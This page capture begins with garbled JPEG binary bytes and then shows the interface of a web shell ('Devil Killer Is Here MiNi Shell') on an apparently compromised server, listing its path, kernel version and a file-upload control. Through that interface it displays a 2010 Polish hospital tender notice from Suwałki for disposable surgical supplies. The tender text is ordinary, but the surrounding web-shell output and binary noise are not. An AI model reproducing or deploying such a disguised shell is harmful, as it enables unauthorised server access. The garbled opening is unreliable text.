JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101117/372036-N-2010.html

<p class="kh_header"><b>Suwałki: Dostawa sprzętu jednorazowego użytku  dla SPSW w Suwałkach</b><br>
<b>Numer ogłoszenia: 372036 - 2010; data zamieszczenia: 17.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku  dla SPSW w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu jednorazowego użytku dla SPSW w Suwałkach w asortymencie i w szacunkowej ilości określonych w załączniku nr 4 do SIWZ w okresie 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8, 33.14.12.00-2, 33.14.14.20-0, 33.14.16.40-8, 33.14.00.00-3, 33.14.13.20-9, 33.14.10.00-0, 33.14.16.20-2, 33.14.13.10-6, 33.17.11.00-0, 39.51.80.00-6, 33.19.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 49.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w prawidłowej wysokości dla danego pakietu, na który Wykonawca składa ofertę. Kwota wadium dla ofert całkowitych wynosi 17 974,95 zł, a dla ofert częściowych kwoty wymaganych wadiów zawiera załącznik nr 6 do SIWZ. 
2. Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (musi być poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (art.45 ust. 6  PZP).  
3. Wadium musi być udzielane do końca terminu związania ofertą.                                                                                                       4. Wadium wnosi się przed upływem terminu składania ofert. 
5. Wadium wnoszone w pieniądzu  wpłaca się  przelewem na poniższy rachunek bankowy Zamawiającego : 
	
Kredyt Bank S.A. 1710 Oddział KB SA w Suwałkach Nr 42 1500 1719 1217 1002 6998 0000

6. Warunki zwrotu wadium i utraty wadium reguluje ustawa pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące::

1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 

2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:  
1) posiadania wiedzy i doświadczenia. 
   
2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: 
1) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
    
2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:

1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: 
1) sytuacji ekonomicznej i finansowej.     

2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:

1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>katalog (prospekt), w którym został zaznaczony oferowany asortyment (pozycja z kodem) -  w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment. W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu zobowiązane są one do dołączenia do oferty tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
1. zmiana stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Wojewódzki w Suwałkach, Dział Zamówień Publicznych, ul. Szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 11:30, miejsce: Kancelaria Samodzielnego Publicznego Szpitala Wojewódzkiego w Suwałkach, ul. Szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I  SPRZĘT J.U. STERYLNY  - WŁÓKNINA STERYLNA 
Zadanie nr 1 Pozycja 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch operacyjny - sterylny  rozm. XL
- przód  i  rękawy  z  podwójnego  materiału, mankiet    zebrany w ściągacz, troki wiązane z tyłu  - 1600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET I  SPRZĘT J.U. STERYLNY - WŁÓKNINA STERYLNA 
Zadanie nr 1 Pozycja 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta z kieszenią pod pośladki, sterylna, o wymiarach oko. 113 x 90  - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET I  SPRZĘT J.U. STERYLNY  - WŁÓKNINA STERYLNA 
Zadanie nr 1  Pozycja 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pokrowiec na nogi pacjenta, sterylny, przeznaczony do zabiegów  operacyjnych w pozycji ginekologicznej, pakowany po 2 szt. o wymiarach 120 x 80 cm, z włókniny o  gramaturze 35 g	   - 500 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET I  SPRZĘT J.U. STERYLNY  - WŁÓKNINA STERYLNA 
Zadanie nr 1  Pozycja 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zarękawnik z włókniny ofoliowanej, sterylny, jednorazowego użytku, z mankietem o gramaturze 43 g , para     - 75 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET II  SPRZĘT J.U. STERYLNY  - RĘKAWICE
Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 2   
Rękawice sterylne  - jałowe, zgodnie z normą  EN 455-1.2.3.; sterylizowane radiacyjnie; niska zawartość pudru i protein lateksowych, kształt w pełni anatomiczny (przeciwstawny kciuk, zagięte palce); rolowany mankiet, oznakowanie  CE; oporne na rozerwanie, łatwe w nakładaniu, dobrze dopasowane, powierzchnia  mikroporowata	
1. Rękawice chirurgiczne  pudrowane - sterylne rozm. 9  - 100 par
2. Rękawice chirurgiczne  pudrowane - sterylne rozm. 8  - 2800 par
3. Rękawice chirurgiczne  pudrowane - sterylne rozm. 7,5  - 9500	par
4. Rękawice chirurgiczne  pudrowane - sterylne rozm.  7  - 7400 par	
5. Rękawice chirurgiczne  pudrowane - sterylne rozm.  6,5  - 3800	par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET II  SPRZĘT J.U. STERYLNY  - RĘKAWICE 
Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 3  
Rękawice chirurgiczne z przedłużonym mankietem - położniczo- ginekologiczne, pudrowane mączką kukurydzianą, grubość minimalna 0,152 mm,  wskaźnik AQL 1,5 DIN EN 455 1+2+3;  długi mankiet ok. 20 - 28cm; koniec zrolowany, przylegające do ręki, mikroporowata powierzchnia dłoni, sterylne
1. Rękawice chirurgiczne   rozm.  6,5  - 10 par	
2. Rękawice chirurgiczne   rozm.  7,5  - 40 par
3. Rękawice chirurgiczne   rozm.   8,5 - 10 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET II  SPRZĘT J.U. STERYLNY  - RĘKAWICE 
Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4  
Rękawice do przygotowywania cytostatyków,  niesterylne, bezpudrowe. Nitrylowe o przedłużonym mankiecie, teksturowane na palcach, o długości 300 mm. Rozmiary:  S, M, L - zgodnie z normą: EN 374, EN 455 1-2-3  
Opakowanie: a100 szt.    - 45 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET II  SPRZĘT J.U. STERYLNY   - RĘKAWICE
Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5
Rękawice chirurgiczne Neoprenowe, bezpudrowe. zielone, o anatomicznym kształcie, mankiet prosty z taśmą przyklejoną, mikroteksturowane,  chlorowane i sylikonizowane, polimeryzowane wewnątrz, o grubości: palec-0.185, dłoń-0,175,, mankiet-0.180, długość 310 mm, sterylizowane promieniami gamma, o wartości finałowego uwalniania AQL 1.0, pakowane po 25par
		
1. Rękawice j.w. rozm. 9   - 100  par
2. Rękawice j.w. rozm. 8,5  - 600 par	
3. Rękawice j.w.rozm. 8   - 1500 par
4. Rękawice j.w. rozm. 7,5 - 2000 par
5. Rękawice j.w. rozm. 7  - 2000 par	
6. Rękawice j.w. rozm. 6,5  - 1000 par
7. Rękawice j.w. rozm. 6  - 100 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET II  SPRZĘT J.U. STERYLNY  - RĘKAWICE
Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6
Rękawice chirurgiczne lateksowe przebadane metodą FIT Kit na zawartość alergenów  lateksowych ,pudrowane mączką kukurydzianą, o anatomicznym kształcie, mankiet prosty, nierolowany, mikroteksturowane, o grubości palec-0235, dłoń-0.205, mankiet-0.245, długość 285 mm, o wartości finałowego uwalniania AQL 1.0, sterylizowane promieniami gamma, pakowane po 40 par		
1. Rękawice j.w. rozm. 9  - 80 par
2. Rękawice j,w, rozm. 8,5 - 600 par	
3. Rękawice j .w. rozm. 8  - 1520 par	
4. Rękawice j.w. rozm. 7,5  - 1520 par
5. Rękawice j.w. rozm. 7  - 1000 par	
6. Rękawice j,w. rozm. 6,5  - 1000 par
7. Rękawice j,w. rozm. 6  - 80 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET II  SPRZĘT J.U. STERYLNY  - RĘKAWICE
Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7
Rękawice chirurgiczne Lateksowe bezpudrowe,  przebadane metodą FIT KIT na zawartość alergenów lateksowych, bezpudrowe o anatomicznym kształcie, mankiet prosty z taśmą przyklejaną, mikroteksturowane, chlorowane i sylikonowane, polimeryzowane wewnątrz, o grubości: palec - 0,220, dłoń - 0,200, mankiet - 0,200, długości 295 mm o wartości finałowego uwalniania AQL 1,0, sterylizowane promieniami gamma, pakowane po 40 par		
1. Rękawice j.w. rozm.9   - 80 par
2. Rękawice j.w. rozm. 8,5 - 600 par
3. Rękawice j.w. rozm. 8  - 1520 par
4. Rękawice j.w. rozm. 7,5  - 1520 par	
5. Rękawice j.w. rozm. 7  - 1000 par
6. Rękawice j.w. rozm. 6,5  - 1000 par
7. Rękawice j.w. rozm. 6  - 80 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET III  SPRZĘT J.U. STERYLNY  - CEWNIKI MOCZOWODOWE 
Zadanie nr 8.</p>
